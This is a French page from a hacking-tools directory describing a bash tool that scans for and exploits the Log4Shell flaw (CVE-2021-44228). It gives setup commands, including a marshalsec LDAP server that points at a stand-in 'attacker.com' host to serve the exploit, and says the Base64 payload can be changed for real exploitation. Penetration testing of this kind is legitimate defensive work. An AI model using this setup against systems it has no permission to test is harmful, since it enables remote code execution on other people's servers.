Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4j-Scanner-Exploit — Script bash qui permet d'identifier la vulnérabilité Log4j CVE-2021-44228 à distance. | Kitploit
Outils/GitHubGitHub/julian911015/log4j-scanner-exploit
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubjulian911015/log4j-scanner-exploit

Log4j-Scanner-Exploit

Script bash qui permet d'identifier la vulnérabilité Log4j CVE-2021-44228 à distance.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 1 anPas encore vérifié

Log4Shell-Scanner-Exploit

Script en bash permettant d'identifier et/ou d'exploiter la vulnérabilité Log4shell à distance. Cet outil effectue différents tests en utilisant des payloads LDAP et les en-têtes X-Api-Version, User-Agent et X-Forwarded-For.

Toujours utiliser ce script avec l'autorisation préalable du propriétaire du service/application audité(e).

Dépendances :

  1. Nous allons créer un serveur LDAP préconfiguré depuis Github: https://github.com/mbechler/marshalsec

mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'

  1. Nous activons un serveur HTTP python3 -m http.server 8080

  2. Avoir Java installé #sudo apt install default-jre

  3. Avoir Curl installé #sudo apt-get install curl

Exemple d'utilisation :

Saisir les paramètres suivants :

  • Liste des URLs à scanner
  • Adresse IP du serveur LDAP
  • Port du serveur LDAP
  • Adresse IP du serveur HTTP
  • Port du serveur HTTP

#Exemple de scan d'application en réseau interne :

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

#Exemple de scan d'application sur Internet :

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

Clarifications :

  • Le payload utilisé envoie une commande "ifconfig" aux machines identifiées comme vulnérables. Ce payload est codé en Base64 et peut être modifié pour réaliser la phase d'exploitation lors d'un audit de pentesting.
  • Si l'on souhaite utiliser l'outil sur des services Internet, on peut lancer un service Ngrok qui fera un port forwarding vers le port local du serveur LDAP.
  • Toujours utiliser ce script avec l'autorisation préalable du propriétaire du service/application analysé(e).
Télécharger l’outil